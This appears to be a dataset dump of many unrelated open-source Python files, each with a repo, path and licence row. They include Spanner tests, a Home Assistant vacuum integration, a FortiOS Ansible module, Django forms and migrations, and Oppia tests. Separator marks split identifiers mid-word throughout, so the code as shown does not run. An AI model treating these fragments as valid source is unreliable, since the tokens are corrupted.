def _make_result_set_stats(query_plan=None, **kw):
from google.cloud.spanner_v1.proto.result_set_pb2 import (
ResultSetStats)
from google.protobuf.struct_pb2 import Struct
from google.cloud.spanner_v1._helpers import _make_value_pb
query_stats = Struct(fields={
key: _make_value_pb(value) for key, value in kw.items()})
return ResultSetStats(
query_plan=query_plan,
query_stats=query_stats,
)
@staticmethod
def _make_partial_result_set(
values, metadata=None, stats=None, chunked_value=False):
from google.cloud.spanner_v1.proto.result_set_pb2 import (
PartialResultSet)
return PartialResultSet(
values=values,
metadata=metadata,
stats=stats,
chunked_value=chunked_value,
)
def test_properties_set(self):
iterator = _MockCancellableIterator()
streamed = self._make_one(iterator)
FIELDS = [
self._make_scalar_field('full_name', 'STRING'),
self._make_scalar_field('age', 'INT64'),
]
metadata = streamed._metadata = self._make_result_set_metadata(FIELDS)
stats = streamed._stats = self._make_result_set_stats()
self.assertEqual(list(streamed.fields), FIELDS)
self.assertIs(streamed.metadata, metadata)
self.assertIs(streamed.stats, stats)
def test__merge_chunk_bool(self):
from google.cloud.spanner_v1.streamed import Unmergeable
iterator = _MockCancellableIterator()
streamed = self._make_one(iterator)
FIELDS = [
self._make_scalar_field('registered_voter', 'BOOL'),
]
streamed._metadata = self._make_result_set_metadata(FIELDS)
streamed._pending_chunk = self._make_value(True)
chunk = self._make_value(False)
with self.assertRaises(Unmergeable):
streamed._merge_chunk(chunk)
def t | est__merge_chunk_int64(self):
iterator = _MockCancellableIterator()
streamed = self._make_one(iterator)
FIELDS = [
self._make_scalar_field('age', 'INT64'),
]
streamed._metadata = self._make_result_set_metadata(FIELDS)
streamed._pending_chunk = self._make_value(42)
chunk = self._make_value(13)
merged = streamed._merge_chunk(chunk)
self.assertEqual(merged.string_value, '4213')
self.assertIsNon | e(streamed._pending_chunk)
def test__merge_chunk_float64_nan_string(self):
iterator = _MockCancellableIterator()
streamed = self._make_one(iterator)
FIELDS = [
self._make_scalar_field('weight', 'FLOAT64'),
]
streamed._metadata = self._make_result_set_metadata(FIELDS)
streamed._pending_chunk = self._make_value(u'Na')
chunk = self._make_value(u'N')
merged = streamed._merge_chunk(chunk)
self.assertEqual(merged.string_value, u'NaN')
def test__merge_chunk_float64_w_empty(self):
iterator = _MockCancellableIterator()
streamed = self._make_one(iterator)
FIELDS = [
self._make_scalar_field('weight', 'FLOAT64'),
]
streamed._metadata = self._make_result_set_metadata(FIELDS)
streamed._pending_chunk = self._make_value(3.14159)
chunk = self._make_value('')
merged = streamed._merge_chunk(chunk)
self.assertEqual(merged.number_value, 3.14159)
def test__merge_chunk_float64_w_float64(self):
from google.cloud.spanner_v1.streamed import Unmergeable
iterator = _MockCancellableIterator()
streamed = self._make_one(iterator)
FIELDS = [
self._make_scalar_field('weight', 'FLOAT64'),
]
streamed._metadata = self._make_result_set_metadata(FIELDS)
streamed._pending_chunk = self._make_value(3.14159)
chunk = self._make_value(2.71828)
with self.assertRaises(Unmergeable):
streamed._merge_chunk(chunk)
def test__merge_chunk_string(self):
iterator = |
mezz64/home-assistant | homeassistant/components/ecovacs/vacuum.py | Python | apache-2.0 | 6,203 | 0.000645 | """Support for Ecovacs Ecovacs Vaccums."""
from __future__ import annotations
import logging
import sucks
from homeassistant.components.vacuum import (
SUPPORT_BATTERY,
SUPPORT_CLEAN_SPOT,
SUPPORT_FAN_SPEED,
SUPPORT_LOCATE,
SUPPORT_RETURN_HOME,
SUPPORT_SEND_COMMAND,
SUPPORT_STATUS,
SUPPORT_STOP,
SUPPORT_TURN_OFF,
SUPPORT_TURN_ON,
VacuumEntity,
)
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.icon import icon_for_battery_level
from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType
from . import ECOVACS_DEVICES
_LOGGER = logging.getLogger(__name__)
SUPPORT_ECOVACS = (
SUPPORT_BATTERY
| SUPPORT_RETURN_HOME
| SUPPORT_CLEAN_SPOT
| SUPPORT_STOP
| SUPPORT_TURN_OFF
| SUPPORT_TURN_ON
| SUPPORT_LOCATE
| SUPPORT_STATUS
| SUPPORT_SEND_COMMAND
| SUPPORT_FAN_SPEED
)
ATTR_ERROR = "error"
ATTR_COMPONENT_PREFIX = "component_"
def setup_platform(
hass: HomeA | ssistant,
config: ConfigType,
add_entities: AddEntitiesCallback,
discovery_info: Discovery | InfoType | None = None,
) -> None:
"""Set up the Ecovacs vacuums."""
vacuums = []
for device in hass.data[ECOVACS_DEVICES]:
vacuums.append(EcovacsVacuum(device))
_LOGGER.debug("Adding Ecovacs Vacuums to Home Assistant: %s", vacuums)
add_entities(vacuums, True)
class EcovacsVacuum(VacuumEntity):
"""Ecovacs Vacuums such as Deebot."""
def __init__(self, device):
"""Initialize the Ecovacs Vacuum."""
self.device = device
self.device.connect_and_wait_until_ready()
if self.device.vacuum.get("nick") is not None:
self._name = str(self.device.vacuum["nick"])
else:
# In case there is no nickname defined, use the device id
self._name = str(format(self.device.vacuum["did"]))
self._fan_speed = None
self._error = None
_LOGGER.debug("Vacuum initialized: %s", self.name)
async def async_added_to_hass(self) -> None:
"""Set up the event listeners now that hass is ready."""
self.device.statusEvents.subscribe(lambda _: self.schedule_update_ha_state())
self.device.batteryEvents.subscribe(lambda _: self.schedule_update_ha_state())
self.device.lifespanEvents.subscribe(lambda _: self.schedule_update_ha_state())
self.device.errorEvents.subscribe(self.on_error)
def on_error(self, error):
"""Handle an error event from the robot.
This will not change the entity's state. If the error caused the state
to change, that will come through as a separate on_status event
"""
if error == "no_error":
self._error = None
else:
self._error = error
self.hass.bus.fire(
"ecovacs_error", {"entity_id": self.entity_id, "error": error}
)
self.schedule_update_ha_state()
@property
def should_poll(self) -> bool:
"""Return True if entity has to be polled for state."""
return False
@property
def unique_id(self) -> str:
"""Return an unique ID."""
return self.device.vacuum.get("did")
@property
def is_on(self):
"""Return true if vacuum is currently cleaning."""
return self.device.is_cleaning
@property
def is_charging(self):
"""Return true if vacuum is currently charging."""
return self.device.is_charging
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def supported_features(self):
"""Flag vacuum cleaner robot features that are supported."""
return SUPPORT_ECOVACS
@property
def status(self):
"""Return the status of the vacuum cleaner."""
return self.device.vacuum_status
def return_to_base(self, **kwargs):
"""Set the vacuum cleaner to return to the dock."""
self.device.run(sucks.Charge())
@property
def battery_icon(self):
"""Return the battery icon for the vacuum cleaner."""
return icon_for_battery_level(
battery_level=self.battery_level, charging=self.is_charging
)
@property
def battery_level(self):
"""Return the battery level of the vacuum cleaner."""
if self.device.battery_status is not None:
return self.device.battery_status * 100
return super().battery_level
@property
def fan_speed(self):
"""Return the fan speed of the vacuum cleaner."""
return self.device.fan_speed
@property
def fan_speed_list(self):
"""Get the list of available fan speed steps of the vacuum cleaner."""
return [sucks.FAN_SPEED_NORMAL, sucks.FAN_SPEED_HIGH]
def turn_on(self, **kwargs):
"""Turn the vacuum on and start cleaning."""
self.device.run(sucks.Clean())
def turn_off(self, **kwargs):
"""Turn the vacuum off stopping the cleaning and returning home."""
self.return_to_base()
def stop(self, **kwargs):
"""Stop the vacuum cleaner."""
self.device.run(sucks.Stop())
def clean_spot(self, **kwargs):
"""Perform a spot clean-up."""
self.device.run(sucks.Spot())
def locate(self, **kwargs):
"""Locate the vacuum cleaner."""
self.device.run(sucks.PlaySound())
def set_fan_speed(self, fan_speed, **kwargs):
"""Set fan speed."""
if self.is_on:
self.device.run(sucks.Clean(mode=self.device.clean_status, speed=fan_speed))
def send_command(self, command, params=None, **kwargs):
"""Send a command to a vacuum cleaner."""
self.device.run(sucks.VacBotCommand(command, params))
@property
def extra_state_attributes(self):
"""Return the device-specific state attributes of this vacuum."""
data = {}
data[ATTR_ERROR] = self._error
for key, val in self.device.components.items():
attr_name = ATTR_COMPONENT_PREFIX + key
data[attr_name] = int(val * 100)
return data
|
obi-two/Rebelion | data/scripts/templates/object/mobile/shared_moncal_female.py | Python | mit | 441 | 0.047619 | #### NOTICE: THIS FILE IS A | UTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Creature()
result.template = "object/mobile/shared_moncal_female.iff"
result.attribute_template_id = 9
result.stfName("npc_name","moncal_base_fe | male")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result |
voidfiles/incursion | tests/test_client.py | Python | mit | 1,150 | 0.00087 | imp | ort incursion as indb
from .utils import InfluxDBClientTest
class TestResponseParser(InfluxDBClientTest):
def test_simple(self):
self.generateData()
query = indb.q('page_views').limit(None)
resp = indb.get_result(query, conn=self.client)
series = resp.get('page_views')
self.assertEqual(len(list(series)), len(self.points))
query = query.limit(10)
resp = indb.get_result(query, conn=self.client)
| series = resp.get('page_views')
assert len(list(series)) == 10
query = indb.q('page_views').columns(indb.count('category_id')).limit(None)
resp = indb.get_result(query, conn=self.client)
series = resp.get('page_views')
self.assertEqual(list(series)[0].count, len(self.points))
def test_groups(self):
self.generateData()
q = indb.q('page_views').columns(indb.count('category_id'))
q = q.limit(None)
q = q.group_by(indb.time('1h'))
resp = indb.get_result(q, conn=self.client)
series = resp.get('page_views')
assert sum(map(lambda x: x.count, series)) == len(self.points)
|
Dhivyap/ansible | lib/ansible/modules/network/fortios/fortios_user_security_exempt_list.py | Python | gpl-3.0 | 13,462 | 0.001931 | #!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_user_security_exempt_list
short_description: Configure security exemption list in Fortinet's FortiOS and FortiGate.
description:
- This module is able to configure a FortiGate or FortiOS (FOS) device by allowing the
user to set and modify user feature and security_exempt_list category.
Examples include all parameters and values need to be adjusted to datasources before usage.
Tested with FOS v6.0.5
version_added: "2.9"
author:
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Requires fortiosapi library developed by Fortinet
- Run as a local_action in your playbook
requirements:
- fortiosapi>=0.9.8
options:
host:
description:
- FortiOS or FortiGate IP address.
type: str
required: false
username:
description:
- FortiOS or FortiGate username.
type: str
required: false
password:
description:
- FortiOS or FortiGate password.
type: str
default: ""
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
type: str
default: root
https:
description:
- Indicates if the requests towards FortiGate must use HTTPS protocol.
type: bool
default: true
ssl_verify:
description:
- Ensures FortiGate certificate must be verified by a proper CA.
type: bool
default: true
state:
description:
- Indicates whether to create or remove the object.
type: str
required: true
choices:
- present
- absent
user_security_exempt_list:
description:
- Configure security exemption list.
default: null
type: dict
suboptions:
description:
description:
- Description.
type: str
name:
description:
- Name of the exempt list.
required: true
type: str
rule:
description:
- Configure rules for exempting users from captive portal authentication.
type: list
suboptions:
devices:
description:
- Devices or device groups.
type: list
suboptions:
name:
description:
- Device or group name. Source user.device.alias user.device-group.name user.device-category.name.
required: true
type: str
dstaddr:
description:
- Destination addresses or address groups.
type: list
suboptions:
name:
description:
- Address or group name. Source firewall.address.name firewall.addrgrp.name.
required: true
type: str
id:
description:
- ID.
required: true
type: int
service:
description:
- Destination services.
type: list
suboptions:
name:
description:
- Service name. Source firewall.service.custom.name firewall.service.group.name.
required: true
type: str
srcaddr:
description:
- Source addresses or address groups.
type: list
suboptions:
name:
description:
- Address or group name. Source firewall.address.name firewall.addrgrp.name.
required: true
type: str
'''
EXAMPLES = '''
- hosts: localhost
vars:
host: "192.168.122.40"
username: "admin"
password: ""
vdom: "root"
ssl_verify: "False"
tasks:
- name: Configure security exemption list.
fortios_user_security_exempt_list:
host: "{{ host }}"
username: "{{ username }}"
password: "{{ password }}"
vdom: "{{ vdom }}"
https: "False"
stat | e: "present"
user_security_exempt_list:
d | escription: "<your_own_value>"
name: "default_name_4"
rule:
-
devices:
-
name: "default_name_7 (source user.device.alias user.device-group.name user.device-category.name)"
dstaddr:
-
name: "default_name_9 (source firewall.address.name firewall.addrgrp.name)"
id: "10"
service:
-
name: "default_name_12 (source firewall.service.custom.name firewall.service.group.name)"
srcaddr:
-
name: "default_name_14 (source firewall.address.name firewall.addrgrp.name)"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: str
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: str
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: str
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: str
sample: "id"
name:
description: Name of the table used to fulfill the request
returned: always
type: str
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: str
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: str
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: str
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: str
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: str
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: str
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import Connection
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
from ansible.module_utils.network.fortimanager.common import FAIL_SOCKET_MSG
def login(data, fos):
host = data['host |
cschenck/blender_sim | fluid_sim_deps/blender-2.69/2.69/scripts/presets/tracking_camera/Canon_1D.py | Python | gpl-3.0 | 219 | 0 | import bpy
camera = bpy.context.edit_movieclip.tracking.camera
camera.sensor | _width = 27.9
camera.units = 'MILLIMETERS'
camera.focal_length = 24.0
camera.pixel_aspect = | 1
camera.k1 = 0.0
camera.k2 = 0.0
camera.k3 = 0.0
|
jjneely/webkickstart | archive/centos5.py | Python | gpl-2.0 | 1,227 | 0.00163 | #!/usr/bin/python
#
# centos5.py - A webKickstart module to handle changes needed from
# RHEL 5 to CentOS 5 Kickstart generation.
#
# Copyright 2007 NC State University
# Written by Jack Neely <jjneely@ncsu.edu>
#
# SDG
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that | it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
| # along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
from baseRealmLinuxKickstart import baseRealmLinuxKickstart
class Kickstart(baseRealmLinuxKickstart):
def __init__(self, url, cfg, sc=None):
baseRealmLinuxKickstart.__init__(self, url, cfg, sc)
self.buildOrder.remove(self.installationNumber)
self.buildOrder.remove(self.RHN)
|
bewareoftheapp/fluxapp | expense/forms.py | Python | mit | 749 | 0 | from .models import Budget, Reimburse
from django.forms import ModelForm
class BudgetForm(ModelForm):
'''Form for expense.models.Budget model.'''
class Meta: # pylint: disable=missing-docstring
model = Budget
fields = [
'value',
'description',
]
labels = {
'val | ue': 'Valor',
'description': 'Descrição'
}
class ReimburseForm(ModelForm):
'''Form for expense.models.Reimburse model.'''
class Meta: # pylint: disable=missing-docstring
model = Reimburse
fields = [
'value',
'description',
]
| labels = {
'value': 'Valor',
'description': 'Descrição'
}
|
madisona/django-image-helper | image_helper/widgets.py | Python | bsd-3-clause | 858 | 0.002331 | from django.contrib.admin.widgets import AdminFileWidget
from django.utils.safestring import mark_safe
class AdminImagePreviewWidget(AdminFileWidget):
"""
An admin widget that shows a preview of currently selected image.
"""
def __init__(self, attrs=None, storage=None):
super(AdminImagePreviewWidget, self).__init__(attrs)
def render(self, | name, value, attrs=None, **kwargs):
content = super(AdminImagePreviewWidget, self).render(
name, value, attrs, **kwargs)
return mark_safe(content + self._get_pre | view_tag(value))
def _get_preview_tag(self, value):
if value and hasattr(value, "url"):
return '<p class="file-upload current-file-preview">Current Preview:<br />' \
'<img src="{0}" style="max-width: 300px;" /></p>'.format(value.url)
return ''
|
wwright2/dcim3-angstrom1 | sources/openembedded-core/scripts/contrib/verify-homepage.py | Python | mit | 2,175 | 0.006897 | #!/usr/bin/env python
# This script is used for verify HOMEPAGE.
# The res | ult is influenced by network environment, since the timeout of connect url is 5 seconds as default.
im | port sys
import os
import subprocess
import urllib2
def search_bitbakepath():
bitbakepath = ""
# Search path to bitbake lib dir in order to load bb modules
if os.path.exists(os.path.join(os.path.dirname(sys.argv[0]), '../../bitbake/lib/bb')):
bitbakepath = os.path.join(os.path.dirname(sys.argv[0]), '../../bitbake/lib')
bitbakepath = os.path.abspath(bitbakepath)
else:
# Look for bitbake/bin dir in PATH
for pth in os.environ['PATH'].split(':'):
if os.path.exists(os.path.join(pth, '../lib/bb')):
bitbakepath = os.path.abspath(os.path.join(pth, '../lib'))
break
if not bitbakepath:
sys.stderr.write("Unable to find bitbake by searching parent directory of this script or PATH\n")
sys.exit(1)
return bitbakepath
# For importing the following modules
sys.path.insert(0, search_bitbakepath())
import bb.tinfoil
def wgetHomepage(pn, homepage):
result = subprocess.call('wget ' + '-q -T 5 -t 1 --spider ' + homepage, shell = True)
if result:
bb.warn("Failed to verify HOMEPAGE (%s) of %s" % (homepage, pn))
return 1
else:
return 0
def verifyHomepage(bbhandler):
pkg_pn = bbhandler.cooker.recipecache.pkg_pn
pnlist = sorted(pkg_pn)
count = 0
for pn in pnlist:
fn = pkg_pn[pn].pop()
data = bb.cache.Cache.loadDataFull(fn, bbhandler.cooker.collection.get_file_appends(fn), bbhandler.config_data)
homepage = data.getVar("HOMEPAGE")
if homepage:
try:
urllib2.urlopen(homepage, timeout=5)
except Exception:
count = count + wgetHomepage(pn, homepage)
return count
if __name__=='__main__':
failcount = 0
bbhandler = bb.tinfoil.Tinfoil()
bbhandler.prepare()
print "Start to verify HOMEPAGE:"
failcount = verifyHomepage(bbhandler)
print "finish to verify HOMEPAGE."
print "Summary: %s failed" % failcount
|
Clinical3PO/Platform | dev/ML-Flex/Internals/Python/DemoArffFeatureRanker.py | Python | apache-2.0 | 2,847 | 0.004917 | # THIS SOURCE CODE IS SUPPLIED "AS IS" WITHOUT WARRANTY OF ANY KIND, AND ITS AUTHOR AND THE JOURNAL OF MACHINE LEARNING RESEARCH (JMLR) AND JMLR'S PUBLISHERS AND DISTRIBUTORS, DISCLAIM ANY AND ALL WARRANTIES, INCLUDING BUT NOT LIMITED TO ANY IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE, AND ANY WARRANTIES OR NON INFRINGEMENT. THE USER ASSUMES ALL LIABILITY AND RESPONSIBILITY FOR USE OF THIS SOURCE CODE, AND NEITHER THE AUTHOR NOR JMLR, NOR JMLR'S PUBLISHERS AND DISTRIBUTORS, WILL BE LIABLE FOR DAMAGES OF ANY KIND RESULTING FROM ITS USE. Without lim- iting the generality of the foregoing, neither the author, nor JMLR, nor JMLR's publishers and distributors, warrant that the Source Code will be error-free, will operate without interruption, or will meet the needs of the user.
#
# --------------------------------------------------------------------------
#
# Copyright 2016 Stephen Piccolo
#
# This file is part of ML-Flex.
#
# ML-Flex is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# any later version.
#
# ML-Flex is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; | without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ML-Flex. If not, see <http://www.gnu.org/licenses/>.
import os, sys, random
def parseArffAttributes(filePath):
| # Get lines in the file that have no comment character and are not empty
fileLines = [line.strip() for line in file(filePath) if not line.startswith("%") and len(line.strip()) > 0]
# Parse out only the lines that are attributes (except the class attribute)
attributeLines = [line.replace("\t", " ") for line in fileLines if line.upper().startswith("@ATTRIBUTE ") and not line.upper().startswith("@ATTRIBUTE CLASS")]
# Parse out the attribute names and return them
return [attribute.split(" ")[1] for attribute in attributeLines]
# Get the arguments that have been specified at the command line
inputFilePath = sys.argv[1]
randomSeed = int(sys.argv[2]) # This random seed demonstrates how to pass other arguments to this learner
outFilePath = sys.argv[3]
attributes = parseArffAttributes(inputFilePath)
# Set the random seed, so the random shuffling will be reproducible
random.seed(randomSeed)
# Randomly rank the attributes (this is a dumb learner for demo purposes)
random.shuffle(attributes)
# Write the attributes that have been ranked (randomly) to the output file
outFile = open(outFilePath, 'w')
for attribute in attributes:
outFile.write(attribute + "\n")
outFile.close()
|
prasanna08/oppia | core/controllers/custom_landing_pages_test.py | Python | apache-2.0 | 3,649 | 0 | # Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apac | he License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language gov | erning permissions and
# limitations under the License.
"""Tests for custom landing pages."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
from core.tests import test_utils
import feconf
class FractionLandingRedirectPageTest(test_utils.GenericTestBase):
"""Test for redirecting landing page for fractions."""
def test_old_fractions_landing_url_without_viewer_type(self):
"""Test to validate the old Fractions landing url without viewerType
redirects to the new Fractions landing url.
"""
response = self.get_html_response(
feconf.FRACTIONS_LANDING_PAGE_URL, expected_status_int=302)
self.assertEqual(
'http://localhost/math/fractions',
response.headers['location'])
def test_old_fraction_landing_url_with_viewer_type(self):
"""Test to validate the old Fractions landing url with viewerType
redirects to the new Fractions landing url.
"""
response = self.get_html_response(
'%s?viewerType=student' % feconf.FRACTIONS_LANDING_PAGE_URL,
expected_status_int=302)
self.assertEqual(
'http://localhost/math/fractions',
response.headers['location'])
class TopicLandingRedirectPageTest(test_utils.GenericTestBase):
"""Test for redirecting the old landing page URL to the new one."""
def test_old_topic_url_redirect(self):
response = self.get_html_response(
'/learn/maths/fractions', expected_status_int=302)
self.assertEqual(
'http://localhost/math/fractions', response.headers['location'])
class TopicLandingPageTest(test_utils.GenericTestBase):
"""Test for showing landing pages."""
def test_valid_subject_and_topic_loads_correctly(self):
response = self.get_html_response('/math/fractions')
response.mustcontain('<topic-landing-page></topic-landing-page>')
class StewardsLandingPageTest(test_utils.GenericTestBase):
"""Test for showing the landing page for stewards (parents, teachers,
volunteers, or NGOs).
"""
def test_nonprofits_landing_page(self):
response = self.get_html_response(
feconf.CUSTOM_NONPROFITS_LANDING_PAGE_URL)
response.mustcontain(
'<stewards-landing-page></stewards-landing-page>')
def test_parents_landing_page(self):
response = self.get_html_response(
feconf.CUSTOM_PARENTS_LANDING_PAGE_URL)
response.mustcontain(
'<stewards-landing-page></stewards-landing-page>')
def test_teachers_landing_page(self):
response = self.get_html_response(
feconf.CUSTOM_TEACHERS_LANDING_PAGE_URL)
response.mustcontain('<stewards-landing-page></stewards-landing-page>')
def test_volunteers_landing_page(self):
response = self.get_html_response(
feconf.CUSTOM_VOLUNTEERS_LANDING_PAGE_URL)
response.mustcontain('<stewards-landing-page></stewards-landing-page>')
|
cnobile2012/inventory | inventory/regions/api/urls.py | Python | mit | 1,144 | 0 | # -*- coding: utf-8 -*-
#
# inventory/regions/api/urls.py
#
"""
Reg | ion API URLs
"""
__docformat__ = "restructuredtext en"
from django.urls import re_path
| from inventory.regions.api import views
urlpatterns = [
re_path(r'countries/$', views.country_list, name='country-list'),
re_path(r'countries/(?P<pk>\d+)/$', views.country_detail,
name='country-detail'),
re_path(r'subdivisions/$', views.subdivision_list,
name='subdivision-list'),
re_path(r'subdivisions/(?P<pk>\d+)/$', views.subdivision_detail,
name='subdivision-detail'),
re_path(r'languages/$', views.language_list,
name='language-list'),
re_path(r'languages/(?P<pk>\d+)/$', views.language_detail,
name='language-detail'),
re_path(r'timezones/$', views.timezone_list,
name='timezone-list'),
re_path(r'timezones/(?P<pk>\d+)/$', views.timezone_detail,
name='timezone-detail'),
re_path(r'currencies/$', views.currency_list,
name="currency-list"),
re_path(r'currencies/(?P<pk>\d+)/$', views.currency_detail,
name="currency-detail"),
]
|
stickwithjosh/hypodrical | apps/podcast/migrations/0006_auto__del_field_podcast_clean__add_field_podcast_explicit__del_field_e.py | Python | mit | 5,558 | 0.007557 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Podcast.clean'
db.delete_column('podcast_podcast', 'clean')
# Adding field 'Podcast.explicit'
db.add_column('podcast_podcast', 'explicit',
self.gf('django.db.models.fields.CharField')(default='', max_length=1, blank=True),
keep_default=False)
# Deleting field 'Episode.clean'
db.delete_column('podcast_episode', 'clean')
# Adding field 'Episode.explicit'
db.add_column('podcast_episode', 'explicit',
self.gf('django.db.models.fields.CharField')(default='', max_length=1, blank=True),
keep_default=False)
def backwards(self, orm):
# Adding field 'Podcast.clean'
db.add_column('podcast_podcast', 'clean',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
# Deleting field 'Podcast.explicit'
db.delete_column('podcast_podcast', 'explicit')
# Adding field 'Episode.clean'
db.add_column('podcast_episode', 'clean',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
# Deleting field 'Episode.explicit'
db.delete_column('podcast_episode', 'explicit')
models = {
'podcast.category': {
'Meta': {'object_name': 'Category'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '300'})
},
'podcast.contributor': {
'Meta': {'object_name': 'Contributor'},
'bio': ('django.db.models.fields.TextField', [], {}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'home_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '300'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'blank': 'True'}),
'twitter': ('django.db.models.fields.CharField', [], {'max_length': '150'})
},
'podcast.episode': {
'Meta': {'object_name': 'Episode'},
'artwork': ('django.db.models.fields.files.ImageField', | [], {'max_length': '100', 'blank': 'True'}),
'contributors': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'episodes'", 'blank': 'True', 'to': "orm['podcast.Contributor']"}),
'episode_number': ('djang | o.db.models.fields.IntegerField', [], {'unique': 'True', 'blank': 'True'}),
'explicit': ('django.db.models.fields.CharField', [], {'max_length': '1', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'length': ('durationfield.db.models.fields.duration.DurationField', [], {'blank': 'True'}),
'mp3': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'blank': 'True'}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'blank': 'True'}),
'show_notes': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '1', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'})
},
'podcast.podcast': {
'Meta': {'object_name': 'Podcast'},
'artwork': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'author': ('django.db.models.fields.CharField', [], {'max_length': '300', 'blank': 'True'}),
'author_email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'copyright': ('django.db.models.fields.CharField', [], {'max_length': '300'}),
'explicit': ('django.db.models.fields.CharField', [], {'max_length': '1', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keywords': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '300', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'podcasts'", 'to': "orm['sites.Site']"}),
'subtitle': ('django.db.models.fields.CharField', [], {'max_length': '300', 'blank': 'True'}),
'summary': ('django.db.models.fields.TextField', [], {'blank': 'True'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['podcast'] |
Royal-Society-of-New-Zealand/NZ-ORCID-Hub | orcid_api/models/credit_name.py | Python | mit | 2,882 | 0.000694 | # coding: utf-8
"""
ORCID Member
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class CreditName(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, value=None):
"""
